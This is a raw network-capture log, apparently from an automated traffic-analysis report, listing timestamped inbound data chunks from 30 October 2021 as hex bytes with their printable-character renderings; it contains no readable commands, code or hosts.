                                                                                                                                                                                      2021-10-30 11:52:08 UTC131INData Raw: e7 29 9d 34 ce 19 0e de cd 6e 76 b3 cd 03 1e f0 80 cd c3 1e f6 b0 cd 05 2f 78 c1 cd bb de f5 ae 13 ef 5f fb fa af ff fa 25 14 87 71 9e 55 27 61 26 be 20 ee b2 38 66 64 fa ca 16 62 bd 0e 69 89 70 5d 4f 84 e2 2d 9d e7 f5 c8 ca 7a f9 5e dc 75 a2 2a 53 d1 b3 89 f9 cc 61 09 f7 73 89 ee fd d1 39 93 63 86 f0 fd cb b8 93 86 2d 42 79 ad 0f c0 71 99 4b ee 88 c9 39 73 c7 0c 59 3b ff a0 a5 1b 95 0c cf ab 6c 22 a3 f6 9e 9f d9 c6 7a 7a f5 1d 89 a3 96 a1 93 bd 06 9f 88 4e d4 67 a1 e7 8b 98 76 5a 03 4e 7a 44 64 1b c9 74 50 e9 7b 78 ff 10 2e 2a 39 60 72 ca 74 a1 ba a0 97 93 26 89 75 65 8c ea 2b bb b5 54 63 da d3 3b 95 2e d3 8b 5e 7e 8f ea 98 c7 99 d6 b9 9c 89 8f ea 60 34 1f aa b8 c8 74 a0 05 26 3e f2 bc e6 35 af b9 38 5c ec a6 f1 eb 4e 16 2c ae 8f 08 65 1f f9 c8 47 6e 5e
                                                                                                                                                                                      Data Ascii: )4nv/x_%qU'a& 8fdbip]O-z^u*Sas9c-ByqK9sY;l"zzNgvZNzDdtP{x.*9`rt&ue+Tc;.^~`4t&>58\N,eGn^
                                                                                                                                                                                      2021-10-30 11:52:08 UTC133INData Raw: db d8 9f 2c 2d 51 da 89 69 70 7b 27 d3 89 aa cc 0c bb 96 3f 6c e2 b9 a8 ce 53 2f be 26 bf 57 06 3c 0e bd 74 06 0b 48 dc 4d e3 9d 69 38 68 5f fe e5 5f be 38 69 cc 7f e6 7c 84 05 e9 39 cf 79 ce e6 03 1f f8 c0 56 73 32 1c ff 9b bf f9 9b 97 05 8f 6b e5 8d 6f 7c e3 36 e7 e8 d1 5c d3 bc 75 89 8b a9 87 31 cf 25 12 75 99 8d f0 bc 96 9d 13 cb b4 c4 6d 84 eb 47 89 65 b2 fa a0 8a 3b fb a8 c3 61 7e 49 74 2f d6 bd 9d f9 2a e7 8c fb b6 ee f3 88 3e 90 eb fe ae 34 f3 34 73 ce 10 a0 4d 9a 0b d1 31 93 b4 e6 cb 88 38 99 de 75 95 44 bb 0a cf f3 72 59 98 91 95 af c8 f2 47 8e a1 b1 8f 1c ea a3 4f 3f a8 4f 80 0a d9 b8 54 f4 f2 5b 78 fd 2e 19 0c 6a 1c 58 e9 32 f1 7c e1 f1 c8 da 3c 88 f9 a4 5d 80 7e e9 62 76 47 4d 17 ae 9c 34 85 e8 c9 d7 05 4c 19 ca 22 ee a8 55 63 d6 d3 65 f9 b3
                                                                                                                                                                                      Data Ascii: ,-Qip{'?lS/&W<tHMi8h__8i|9yVs2ko|6\u1%umGe;a~It/*>44sM18uDrYGO?OT[x.jX2|<]~bvGM4L"Uce
                                                                                                                                                                                      2021-10-30 11:52:08 UTC134INData Raw: ee cf 72 d4 90 b8 83 86 70 af c7 9e b2 08 f5 01 ed 41 38 d7 ba 46 08 5d 34 17 7c 4e 28 94 b4 70 bb 68 3b a2 57 5e d4 b5 44 78 5c 64 3a a1 bc 96 0d f4 8e 91 91 d5 4d 1c f1 fb 83 e2 ae db 9b a3 96 55 ee 71 81 4e 32 ca 4c 99 d9 7a 47 d1 80 66 a2 7c e1 71 91 e9 9c 2a bf 57 4e c8 8e d0 2f 26 c4 2f 38 d9 d1 77 2e 7a 2e 78 df 59 93 93 86 68 57 4d ce 5a bc d8 a3 c3 56 b1 36 0f 62 ff 49 4b a7 b8 a7 85 c7 9d 35 fa 2a ef 4c 25 8e 79 2b ad 78 a6 83 98 3f 6a 07 23 71 e8 a5 7b 70 fe e2 6e da d5 af 7e f5 a1 dd 34 ca f2 12 db e7 3f ff f9 5b cd a9 e8 57 a3 7a ff da f3 9e f7 bc 6d ce 01 b4 57 22 aa 3e cc f6 6d 16 cd 65 0f 25 f1 be 11 e3 6e 13 cb 46 5c 97 e5 8b 98 d7 4a 13 9f 91 11 64 17 43 70 5d 2f 3f 0b c1 e3 23 68 9e c8 39 43 a2 73 c6 7d 18 c9 9c 33 77 d0 b0 d1 07 6c bf
                                                                                                                                                                                      Data Ascii: rpA8F]4|N(ph;W^Dx\d:MUqN2LzGf|q*WN/&/8w.z.xYhWMZV6bIK5*L%y+x?j#q{pn~4?[WzmW">me%nF\JdCp]/?#h9Cs}3wl
                                                                                                                                                                                      2021-10-30 11:52:08 UTC135INData Raw: fd 89 fb b9 cf 7d ee e5 9a 68 ed a6 c5 b6 79 3a e6 89 4a 7f 18 68 ee eb 3a c8 84 f1 f4 c5 1b e1 de 81 e0 9c f1 a3 0b e4 13 9f f8 c4 e6 93 9f fc e4 22 c4 3f fe f1 8f 2f f1 cc 61 8b f5 21 8e d2 d1 a6 12 d9 3a 51 1f f3 21 cb cb e2 b1 6c af 5c 06 e7 55 a2 39 42 98 39 6a 38 61 ba 17 23 72 d2 94 8e 8e 9a 3e 38 03 ed 40 18 63 77 cc 74 bf 8f 92 9d df 28 3d 2a db 4a 0f 9e a7 fc a8 8b 12 6d 84 e7 8d 84 4e 4f 97 e5 3b 99 6d af 4c bc c6 63 5a ec ec a8 a9 62 3f 40 76 30 74 55 23 2a 54 c6 25 d3 57 30 48 71 a0 e2 60 ba b8 4e 71 27 a6 33 7a 36 ad fc b5 79 42 36 84 88 2e 3c dd 4c e5 a8 71 53 f5 4f bd c4 d1 e3 cc 71 c1 02 17 3b 17 be 6e 16 7e 63 40 fc c6 80 64 ce 1a 64 e7 a7 75 ce 46 f0 b1 f0 3e 0b 8f 3b b3 fa b3 03 ad 73 91 e5 55 f6 ad fc 51 1d 8c c4 45 a6 1b 45 8b 13 a1
                                                                                                                                                                                      Data Ascii: }hy:Jh:"?/a!:Q!l\U9B9j8a#r>8@cwt(=*JmNO;mLcZb?@v0tU#*T%W0Hq`Nq'3z6yB6.<LqSOq;n~c@dduF>;sUQEE
                                                                                                                                                                                      2021-10-30 11:52:08 UTC137INData Raw: aa 2f 3b 17 31 ed c4 b4 a8 f4 67 17 e2 98 7a 3a 8b 47 7b 8d 29 e3 9d a1 f3 1c cb 57 75 47 bd e7 45 32 5d 45 cb 96 f9 c8 ae b1 9f eb ef fb be ef 5b 9c 35 be fc cf 4e 18 8b 5e 56 07 65 fe e9 9f fe 69 73 fb db df fe 94 31 b8 c3 1d ee b0 b9 d4 a5 2e b5 38 21 3c fa e4 38 37 b8 c1 0d 4e 7a 6f 9a 7f d8 89 a0 93 7e 24 7e 1c f0 76 81 ce 3f 7d 17 e4 31 36 97 bf fc e5 17 c7 ec ab bf fa ab 97 9d c7 f3 9c e7 3c 8b b0 fb c8 bb eb 78 11 b0 3f 8e 66 9c 1c cd bd 88 74 71 5c 48 bb 48 e7 a1 a3 7a 62 08 2d 5d 45 95 ef 6d 42 e8 27 f7 57 42 9c 2c 84 f9 87 83 86 c8 11 93 63 e6 0e 9a 9c 38 c4 e7 16 c2 f1 11 3f 27 1e c6 b8 6c 3d 94 80 a7 47 c5 c9 f4 ae 9b 95 aa bc f0 78 0b d9 65 f6 bd 3a 66 8e d7 aa 3f cb e3 1c c6 50 a2 b4 c8 3f 52 36 f0 c2 4e d4 57 76 82 7c 97 c3 a2 1a 28 d2 95
                                                                                                                                                                                      Data Ascii: /;1gz:G{)WuGE2]E[5N^Veis1.8!<87Nzo~$~v?}16<x?ftq\HHzb-]EmB'WB,c8?'l=Gxe:f?P?R6NWv|(
                                                                                                                                                                                      2021-10-30 11:52:08 UTC138INData Raw: 2b 5a 79 a0 73 9c e1 79 53 8e da 28 9a bc bb a0 3a a2 cc c2 40 ad 91 16 ad 76 b4 ca 1e 46 de 08 94 47 b8 68 75 51 6b 67 0d e7 4b 8e 9a ef aa f9 23 50 1c 35 f2 b1 c5 b9 a3 3c f5 31 0e 5a a0 08 15 97 f8 79 6b 8d 59 46 ec b3 fa 10 f5 a2 b2 3f 3b 13 c7 d4 d3 bd 78 a5 73 3d e7 fa d5 af 7e f5 b2 88 f0 0b 47 76 95 f8 b2 38 bf 88 fc c9 9f fc c9 ad d5 01 9a 5b 5a 18 c0 cf 41 d4 e9 38 d2 57 78 7b 7a 70 6c df 4d 03 be e0 ce 4e 0f df 4d 63 21 64 5e 66 d0 0e e6 f5 0b 5e f0 82 ad 66 b3 f4 f1 9b bf f9 9b 17 27 0d 67 84 f2 fc 6d d4 db de f6 b6 ad c5 41 fb 58 58 d5 ce aa bd ba 1e 80 30 bb 3e 24 c2 e3 a7 1b c6 87 f1 15 b4 cd ff e5 01 e7 23 73 d2 80 71 c5 c1 f7 73 1d fb 0a 71 2e 64 73 23 b3 91 4e 71 4f 3b 51 ef f9 2d 5d 46 3c 4f 88 ee 7b 8c 03 bb 68 08 73 26 3a 6a d1 59 73
                                                                                                                                                                                      Data Ascii: +ZysyS(:@vFGhuQkgK#P5<1ZykYF?;xs=~Gv8[ZA8Wx{zplMNMc!d^f^f'gmAXX0>$#sqsq.ds#NqO;Q-]F<O{hs&:jYs
                                                                                                                                                                                      2021-10-30 11:52:08 UTC139INData Raw: 31 66 ea cc e0 97 bf da 4d c3 f1 70 47 dd e1 38 fc bb c3 1f ff f1 1f 6f 35 07 a0 f7 3e 4a dc 59 53 1b 1d b5 39 d3 7b 9f 3c 3f b3 cd 42 88 b6 11 9d 2f 9d 7f 84 be 73 1d 20 da 45 93 63 26 f1 5d 34 24 db 45 a3 5e 8e 8f d0 97 38 36 2e 1a 1f 17 95 3d 0c 11 b3 7a 11 f3 a3 44 1b 91 c5 ab d0 e9 e9 aa f8 5a f6 51 07 e7 bf c5 90 a3 36 42 76 20 4d 6c 97 8c 5e be 93 d9 30 50 1a 2c c5 25 9a c4 23 93 39 23 3b de 68 5b ab 3a 2b 3d b4 f2 46 a8 fa 12 f5 4a 23 ba d8 b9 09 70 b3 c4 09 93 d3 86 63 16 05 7d dc 55 03 c6 c4 6f 62 c4 75 13 52 d8 1a 37 6f 13 22 14 cf f2 44 a6 3b bb 31 db 47 ec 75 63 d7 b8 f9 f8 2b 1e c3 08 75 c4 73 0d 9c 53 16 20 de 4a 4f 5c b8 8d a3 36 20 4a 3b 9e 1f a5 87 16 31 c1 a3 d9 99 c7 9e fc 68 80 77 a5 69 47 84 f9 fb b0 87 3d 6c 73 ff fb df 7f 6b 71 2a
                                                                                                                                                                                      Data Ascii: 1fMpG8o5>JYS9{<?B/s Ec&]4$E^86.=zDZQ6Bv Ml^0P,%#9#;h[:+=FJ#pc}UobuR7o"D;1Guc+usS JO\6 J;1hwiG=lskq*
                                                                                                                                                                                      2021-10-30 11:52:08 UTC141INData Raw: 58 89 e7 13 57 5a f1 51 c9 ca 40 d4 65 52 d9 55 fa 4a 62 1b 7a 6d ca e2 59 08 2d 1d 8c e6 43 15 87 9e 5d 0c 05 e9 38 07 09 25 31 ed ba 93 c2 b5 8e 5a 8c 67 e9 c3 90 0c 06 43 a2 49 50 85 51 54 de 43 70 dd 8c a8 8c 13 d3 4e 2b 6f 84 5d cb 0b 8d ad 8f 75 76 a3 d2 cd ca e3 b2 51 79 39 57 72 d2 24 e8 dc f1 a2 ed 51 94 e7 b6 0a 95 2f 5b 50 38 03 37 52 5e 2b f1 2d df f2 2d cb 62 a1 5f af a1 f7 1b aa c3 71 71 7e 70 dc 78 55 05 0b e8 5b df fa d6 45 0f e8 58 e8 05 0e 5d 5c 64 81 e3 71 9c bf fe eb bf de 6a e6 c0 29 bb fe f5 af bf 38 68 3c 72 44 d0 b1 e0 79 fb 19 6f 1c 34 1e 3f f1 18 ef bd ef 7d ef a2 07 9d d7 78 ce 81 f1 f4 1d 1e 16 57 1e 01 b6 16 66 ec 5f f3 9a d7 2c bb 58 bb a2 45 4e c7 50 bb 20 6b 2f 70 7c 1e cd 0b 76 17 d9 cd 61 8c 5a ce 04 d0 5f e6 d7 9f fd d9
                                                                                                                                                                                      Data Ascii: XWZQ@eRUJbzmY-C]8%1ZgCIPQTCpN+o]uvQy9Wr$Q/[P87R^+--b_qq~pxU[EX]\dqj)8h<rDyo4?}xWf_,XENP k/p|vaZ_
                                                                                                                                                                                      2021-10-30 11:52:08 UTC142INData Raw: 11 3d d2 ca 8b 6d ee f5 c1 eb 52 3c 0b 61 56 07 bb c4 a1 4a c7 10 a2 ad d0 1c f3 78 94 98 e7 9c 7a b5 0f e0 95 c4 0a 85 1f 70 c4 66 96 38 38 c8 e8 04 57 19 e1 71 88 e9 c8 9a f6 8a 5e dd 47 05 ed c8 24 e6 31 8e 08 37 5e 39 5c 08 8b 95 44 69 42 ec b0 77 fc 3c 6b ec aa 31 f4 36 28 cc 74 b3 b0 68 5f fa d2 97 5e be 6f c4 77 67 be fa ab bf 7a 71 d8 b4 2b c5 27 7f 3e ed bb d3 c6 4d 57 37 6f dd c0 b9 21 63 7b ae 73 9d 6b 71 46 58 ac 66 84 1d 1e 8e e9 8f 22 5b 70 2c de 53 c6 6e 15 7d e0 fb 4b e7 3b df f9 96 ba 68 b7 1c 35 da 07 8c 3d e7 82 1d 2b 42 f4 38 a3 b7 b9 cd 6d 96 7c 11 c7 50 e7 23 ea 39 26 63 a1 fa 33 28 fb 81 0f 7c 60 9b 3a f8 7f cd 7b dc e3 1e 8b 63 80 83 87 b0 b0 47 e1 fb 4a fc 4d 13 8f 12 71 20 1c da 5e 5d c3 ae 27 ce bc 13 8c 07 63 ac 1d 52 ce 59 06
                                                                                                                                                                                      Data Ascii: =mR<aVJxzpf88Wq^G$17^9\DiBw<k16(th_^owgzq+'>MW7o!c{skqFXf"[p,Sn}K;h5=+B8m|P#9&c3(|`:{cGJMq ^]'cRY
                                                                                                                                                                                      2021-10-30 11:52:08 UTC143INData Raw: 72 dc d1 dd 29 c6 81 37 fb b3 5b 89 23 4b c8 4e 0e 6d 66 31 6b 95 65 b1 64 0c 71 7c 6f 77 bb db 6d b5 07 68 ce 08 c5 09 c9 a3 8f 0e 75 50 57 cb b1 04 76 86 78 0d c7 2f ff f2 2f 2f 63 8b e0 94 b2 18 f7 da 2b 68 37 bf a6 74 bc ad 0e 7a 09 ed ce 76 a6 d8 59 d4 39 f6 e3 13 c7 31 e0 bb 82 0e 75 55 f7 47 87 7a 39 7f 8c 89 d7 4d 7a 76 57 ed af fe ea af 96 f6 ef 13 8e c7 f5 e9 df f7 73 c8 97 c4 f9 20 d0 73 dd 32 1f 64 13 05 18 2f fa cf b9 93 73 86 c8 39 e3 fc bb 73 86 a0 47 b0 f1 71 a4 0e ea d2 39 e0 b8 88 da 50 09 6d 89 e1 61 8a 33 a3 cf 74 22 e6 79 ba d2 49 84 e2 55 d8 63 d4 0e dc b6 55 6e a6 ce 51 5a f7 59 f2 62 be d2 ae ef df 8d 02 55 a5 11 f4 3d 59 03 03 e9 e2 13 bd 35 e9 55 b6 a2 95 b7 2b 87 59 f7 28 bb b4 81 b2 12 c6 18 e1 66 24 91 93 e6 21 e2 36 f1 dc b4
                                                                                                                                                                                      Data Ascii: r)7[#KNmf1kedq|owmhuPWvx///c+h7tzvY91uUGz9MzvWs s2d/s9sGq9Pma3t"yIUcUnQZYbU=Y5U+Y(f$!6
                                                                                                                                                                                      2021-10-30 11:52:08 UTC145INData Raw: c7 8c 45 06 47 cd d1 9c 25 a4 9e d8 2e fe 33 14 47 8d f2 bd dd 29 ca b2 e0 b2 d8 fb 5b f4 05 8f cb f8 61 c4 c7 3e f6 b1 c5 ae 05 8b 28 ef 63 a3 cd 42 f3 45 68 0e 31 a6 0e 2f d6 d5 82 3a 72 4d aa dd ec cc bc e1 0d 6f d8 6a 0f 9c 17 9c ce 11 47 8d 3a e2 23 bb 0c ec 62 9b 39 47 fc 65 15 8f b7 7b bb a7 94 e5 87 21 ad f1 d3 b9 74 a8 b7 f7 3d 43 f4 fc 50 66 14 7e 41 cc d8 70 dd f4 c6 a7 05 63 f1 c2 17 be 70 f3 07 7f f0 07 5b cd 01 f4 c3 c7 51 63 e7 f0 7e 3f ae 13 84 f9 e5 a8 bc 44 ce 15 21 63 2b 27 8d 7e 33 de ee a0 b9 73 96 ed a2 81 da 23 a1 1f 12 d7 23 d8 ce ca 28 59 59 89 93 e9 ab b4 eb c0 f5 a3 92 51 e9 2b 7a f6 9e 3f 5b 77 45 ac a7 aa 57 fa d6 71 35 57 c0 e3 15 3d 9b a6 a3 a6 c2 ad 4a 7a 07 20 5f b2 0b 0c 8a c4 2f 80 de c5 20 3c 0e 31 0d 99 6e 14 ef e3 ae
                                                                                                                                                                                      Data Ascii: EG%.3G)[a>(cBEh1/:rMojG:#b9Ge{!t=CPf~Apcp[Qc~?D!c+'~3s##(YYQ+z?[wEWq5W=Jz _/ <1n
                                                                                                                                                                                      2021-10-30 11:52:08 UTC146INData Raw: 44 16 5f de 71 e6 68 01 f2 31 16 38 68 94 1f 69 0b 8b 55 fc 8e 11 f5 b2 c8 69 ee c7 6b 80 3f dc c6 39 6e 7d d7 8a e3 71 7c 16 e3 16 d8 f1 5f 9d fc 10 80 f7 cd b1 d3 43 99 56 9b e9 2f c7 e6 97 96 d9 0e 15 fd c7 51 ee ed 42 01 75 c5 47 e7 b1 bf d8 68 ce 0b 1c 01 be cf 27 c7 1c 67 ba e7 98 03 3f 46 71 38 96 1f 2f 9e 4b 1c 1a ed 3c f5 76 19 79 34 dd 03 a7 0f d1 f7 27 9f f9 cc 67 6e 73 0e c0 f9 e4 dc f6 5e 55 c3 bc e1 78 d5 6e 9a 13 fb c4 b5 a7 9d 6c ce 4f fc 21 10 3a c6 32 3a 67 48 74 d0 e4 a4 c9 41 a3 0c 63 e4 e3 ea e7 cf c5 f5 c4 25 31 ad 3a 46 c5 c9 f2 a3 38 3d bd a8 d2 ae 13 31 cf d3 3d 91 bd c8 74 62 24 0f aa b8 18 b1 8d e5 66 f3 62 d8 22 9b d3 4e 2b df f3 ca 2b 57 46 6e 9c 55 8a 2e d3 ef 02 03 30 22 7e 51 78 39 c5 9d 98 16 23 76 55 d9 38 36 d5 38 8c 8e
                                                                                                                                                                                      Data Ascii: D_qh18hiUik?9n}q|_CV/QBuGh'g?Fq8/K<vy4'gns^UxnlO!:2:gHtAc%1:F8=1=tb$fb"N++WFnU.0"~Qx9#vU868
                                                                                                                                                                                      2021-10-30 11:52:08 UTC147INData Raw: 45 3b 41 e7 3b 83 63 f3 3d ae 37 bd e9 4d cb e3 c5 9f fe e9 9f 5e 9c 1c ce 01 ce 14 e7 81 be e2 54 8e 38 69 3a 1f 67 9d 75 d6 56 73 2a aa 8f 73 c1 b9 a5 fd 19 aa 0b 27 cb d1 f8 02 36 d1 11 66 d7 93 31 d6 3b d3 d8 59 e4 8f e1 7b 50 d7 eb 5e f7 ba 6d ea 80 78 5f f1 71 a4 1d 1c 87 39 da 7b ec 49 39 fe 32 ab 45 dc 4d e3 7b 89 fc 09 bf c3 bf 49 30 6e ad e3 71 be df f3 9e f7 a4 bb 69 12 e1 fd 01 e6 8c ae 3d 8e c1 23 74 ea 12 e8 70 c4 e4 98 45 a1 dd 0a e5 a4 65 bb 69 b4 31 0a 6d 41 3c de 13 91 e5 ad 15 a7 ca 1b d1 79 5a 3a 88 fa 35 e2 f5 28 9e 85 30 93 07 87 11 87 56 3a e6 39 ad bc 16 f1 da 15 99 5e ba f4 ea 9d ad 48 b2 2b 74 7c 44 a2 ad a8 e2 4e a6 1f d5 55 a8 ef 3e 16 12 e1 71 67 e6 38 ce 4c b9 b5 c7 10 b3 e5 b1 f7 32 4a 4b 74 c3 f3 1b 61 bc 09 aa 9c 13 d3 47
                                                                                                                                                                                      Data Ascii: E;A;c=7M^T8i:guVs*s'6f1;Y{P^mx_q9{I92EM{I0nqi=#tpEei1mA<yZ:5(0V:9^H+t|DNU>qg8L2JKtaG
                                                                                                                                                                                      2021-10-30 11:52:08 UTC149INData Raw: a9 71 d3 f1 9c 99 7f cc a0 7c eb fb 69 fc 5b 06 e7 b2 b5 9b 46 5b 70 0c c9 6f 5d 17 8c 49 dc 85 c4 d6 45 63 e8 c4 dd 34 9c 5a 7f 77 1a e7 09 c7 9f eb 87 be 32 d7 08 69 0b 42 9a 50 0e 9b 1c 38 ca 71 3c bf 27 73 ec e3 2c 55 1b 33 fd a8 ae 25 cc ad 4c 2f f1 fa b2 b8 88 ba 56 9e 53 d9 65 7a a8 e2 30 9a 07 99 6d 0c 45 4c 67 f8 1c 8b 64 79 99 6e 78 65 a8 0e 86 5e 32 8b 77 3e c6 47 45 65 3c 74 46 75 30 ab 8f 68 0c 46 c7 63 b4 5e 18 b5 9d a9 33 63 d7 f2 3d a8 3f 13 bf 29 1c 37 66 76 d3 e8 47 f6 45 fb 6c 3e b0 78 6b 41 19 71 5c 04 63 c4 c2 f7 a1 0f 7d 68 f9 de 13 bb 1e f1 bb 57 2c 44 5a 8c 84 ca 09 f2 7c c7 84 1d 98 56 df 80 f2 71 37 89 3f 35 e7 5d 70 bc 74 96 5f 9d e2 f4 51 17 fd c1 79 e2 e5 c2 fc a8 82 97 cc be e8 45 2f 5a 1e 59 8e 3c aa fc ab bf fa ab 65 97 10
                                                                                                                                                                                      Data Ascii: q|i[F[po]IEc4Zw2iBP8q<'s,U3%L/VSez0mELgdynxe^2w>GEe<tFu0hFc^3c=?)7fvGEl>xkAq\c}hW,DZ|Vq7?5]pt_QyE/ZY<e
                                                                                                                                                                                      2021-10-30 11:52:08 UTC150INData Raw: ed 66 d0 5c 8d 64 7a e9 4e cc ca 68 94 a5 b3 8a 40 79 55 7e 84 ce 8e 8a 13 75 8a 67 3a 27 d3 41 a5 87 d1 32 99 dd cc 58 54 b4 da 16 99 b1 8d ec 52 56 50 c7 6c 3d b2 f7 72 6b ea 39 4c 66 77 d3 de f7 be f7 9d f2 c6 76 a8 e6 c2 ec 35 93 fd d7 a3 16 22 42 5f 64 a8 57 e3 19 17 75 1e c5 b9 13 f1 9a d7 bc 66 f9 83 fa 16 d4 83 53 a1 5d 32 de 6f 76 a9 4b 5d ea c4 4e 14 0e 0e ff 38 c0 77 e6 b0 6d c1 ce 49 ef 3b 65 e8 f9 8e 9a a0 3f 8c 7f 1c 2f ed a8 21 d5 58 d2 9e d6 ee 1c af ce 68 ed 0a 81 fa cf df 72 39 d2 3b 38 2d bc 33 8e ef eb c9 d9 e1 7b 6d 3c c6 75 c8 e7 dc d0 ee 99 b6 a3 f3 71 e3 fc cf fc ff 2c 70 5c ff 77 0b 71 f9 cb 5f fe a4 d7 88 f0 dd 32 fe 48 3f 83 73 8f 70 0e e4 30 47 68 6b fc f1 09 6d 43 34 67 b1 f1 dd 34 c6 82 5f 22 ab 3f cc 2d 76 f4 fc c7 32 7c 38
                                                                                                                                                                                      Data Ascii: f\dzNh@yU~ug:'A2XTRVPl=rk9Lfwv5"B_dWufS]2ovK]N8wmI;e?/!Xhr9;8-3{m<uq,p\wq_2H?sp0GhkmC4g4_"?-v2|8
                                                                                                                                                                                      2021-10-30 11:52:08 UTC151INData Raw: 19 1c 23 fe 22 2e ce 2f a5 b1 cd 9c 34 1c 42 7e a1 a9 f7 9c e1 28 f0 5e 33 6c 79 4d 07 f5 57 ce 1a 75 52 1f bb 30 80 a3 46 1f f8 5e 17 21 2f 20 f5 f3 a8 05 4e ed f3 3c e0 91 1f 63 5a f5 99 76 c4 ef 82 79 5f 1d c6 6f 84 6a 47 8d b1 60 0e c8 81 a8 da c4 a2 e6 3b 43 11 9c 7b 9c 0c de 97 c6 dc c1 49 e3 df 1b f8 b7 86 0c 39 22 2d 07 91 71 8b 7f 07 e6 f0 78 95 f7 d7 e1 5c f1 85 7d e6 21 63 df 83 be e8 85 bb c0 77 d2 78 cd 8a fe 39 42 8f 3c b3 1f 10 08 ce 87 6c ab 71 a3 fd f1 f5 31 da 65 e5 1c 7f f2 93 9f dc 6a 0f 60 4c b2 1f 60 f8 fc d1 31 75 3c 42 da 42 88 c8 e9 e2 38 84 a4 c9 97 83 c6 71 e5 a0 a8 1c 36 2a 27 21 ad 3a b1 43 1c ca 4b 62 7a 56 aa f2 99 3e d3 ad d1 8f 8a 97 57 dc 89 7a cf df 87 4e b4 d2 3d 5b 18 b1 11 ca ab 42 68 95 cf 88 f3 c7 89 79 99 6d 7e 57
                                                                                                                                                                                      Data Ascii: #"./4B~(^3lyMWuR0F^!/ N<cZvy_ojG`;C{I9"-qx\}!cwx9B<lq1ej`L`1u<BB8q6*'!:CKbzV>WzN=[Bhym~W
                                                                                                                                                                                      2021-10-30 11:52:08 UTC153INData Raw: 77 89 ac 22 74 99 1e 2a 3d 1d 94 78 3a c6 33 dc ce a9 ca ac b5 73 d6 e6 1d 26 6b 8f bb 8f f6 ee ab cf b1 1e a5 5d bf af 63 45 58 38 79 29 27 8f a5 58 90 70 12 b4 30 23 dc 8c b1 61 27 84 7c 84 78 6f a7 8b 9b 3c bb 11 d5 8b 54 e9 4f ec 13 37 7c be fc 3d bb 9b c6 e2 c0 6e 02 0b 85 a0 6e 5f 80 b8 f9 3a 2c 6a 38 11 ee a4 49 e7 5f ac e7 7b 4e 38 5e 2a 1f af 65 8e c3 c2 ea 3b 23 2c 76 72 08 94 ce 50 1b 05 75 5f ed 6a 57 5b 1c 54 16 63 c6 c3 17 78 ea e3 51 97 ef 7e f5 16 46 9c cc 16 d4 c9 f8 64 0e 0f 8b 71 ef f1 1d d0 8f f8 8b 5b 9c 8b 7b dc e3 1e 27 9c 34 9c 0c ea e2 3f 5e 79 a4 ee 70 de 62 1f 5a 8f 7f 81 63 66 2f ba e5 95 2e 38 da 9a cb fc ff 29 3f e6 e0 57 b8 f1 bc 54 b0 d3 f7 86 37 bc 61 f9 50 42 1d ba 26 70 ea 63 3f 69 b7 8b e0 38 08 ed cc 40 1f 77 14 99 0b
                                                                                                                                                                                      Data Ascii: w"t*=x:3s&k]cEX8y)'Xp0#a'|xo<TO7|=nn_:,j8I_{N8^*e;#,vrPu_jW[TcxQ~Fdq[{'4?^ypbZcf/.8)?WT7aPB&pc?i8@w
                                                                                                                                                                                      2021-10-30 11:52:08 UTC154INData Raw: 70 00 76 38 12 ea 4b 1c a3 0a 6c 7f fd d7 7f 7d d9 1d 74 28 8f d0 06 c5 95 76 b8 0e b8 6e b2 79 8b 2d ef 65 a3 8f 11 f2 fc bb 93 72 76 f9 93 78 7e cc e3 b0 9b c6 dc 94 73 84 c8 49 43 e4 54 e1 a0 21 1a 53 a0 4d 8c 09 4e 59 14 39 6b 08 36 cc 59 8d 1d e5 75 7e a8 d3 9d 35 74 95 c3 26 b2 f9 84 2e 93 2c 6f 17 5d 4b 74 cd b6 44 75 8e 84 30 ab 83 d9 38 f4 d2 b0 8b 2e 22 9b 11 5b 88 73 c0 59 9b e7 9c 7a 87 f8 0c b1 30 e9 d1 0a e9 98 24 4b cf 10 cb b4 ea c9 f4 ad 63 ae cd 13 23 36 3d 46 c7 74 84 5d da b3 8f be 50 87 a4 85 f2 f7 71 cc 19 38 5e f6 f2 50 6e b8 fc 22 54 ff 3d 39 d2 2e 76 36 22 94 43 32 a7 81 1f 33 f0 1d 22 1e ef e0 a8 b0 f8 00 df 2f 02 16 78 5e 2e 8a d3 c6 c2 91 c1 82 c0 23 5b be bb c3 a3 5c e0 71 2e 3a 16 f1 fb df ff fe cb 5f 21 f1 9d 29 77 22 d8 39
                                                                                                                                                                                      Data Ascii: pv8Kl}t(vny-ervx~sICT!SMNY9k6Yu~5t&.,o]KtDu08."[sYz0$Kc#6=Ft]Pq8^Pn"T=9.v6"C23"/x^.#[\q.:_!)w"9
                                                                                                                                                                                      2021-10-30 11:52:08 UTC155INData Raw: 57 31 5c fd ea 57 df 6a 3f 0b 37 72 be 4f c6 6b 14 78 2c c5 a2 a4 57 20 50 3f 3f 62 88 ef 1e 03 16 8a 9b dd ec 66 cb 97 f7 59 fc b2 ef fe b0 28 e0 ec f0 08 8c 1d 09 ea 66 07 8d 45 8f fa b1 ff e1 1f fe e1 e5 3b 71 3e be 59 bf 70 ee 28 a3 05 31 42 5d d5 7f 4d f2 f8 93 9d 2c 1e d7 b2 20 d2 26 d2 ec 8c f1 9d a7 3b dc e1 0e cb e2 cc 77 ba 7c f7 84 05 8e 7a 79 05 07 79 3c 12 75 e7 8a fe 21 59 7b 04 7d a1 cd 0e c7 e4 7c 54 4e ae 43 fd 0e 2f b3 e5 3b 68 ec b8 32 e6 d9 bc 44 47 bd e4 e3 d8 e1 a4 c5 5f 9c 66 4e 9a 88 3a 39 38 38 6b d1 c1 71 38 2e 4e 06 ff 24 c1 23 ee 08 8e 39 e3 ca f8 eb 5c 66 30 e6 ec 00 7e cb b7 7c cb f2 e8 d4 61 3c 35 e6 3e 4f 14 27 94 e8 fc 08 e6 31 7f ad c5 58 e0 f4 44 18 13 da c8 75 c6 87 0b 5d 0f b4 99 e3 f1 18 54 ff 21 2b b8 7e 34 27 39 a6
                                                                                                                                                                                      Data Ascii: W1\Wj?7rOkx,W P??bfY(fE;q>Yp(1B]M, &;w|zyy<u!Y{}|TNC/;h2DG_fN:988kq8.N$#9\f0~|a<5>O'1XDu]T!+~4'9
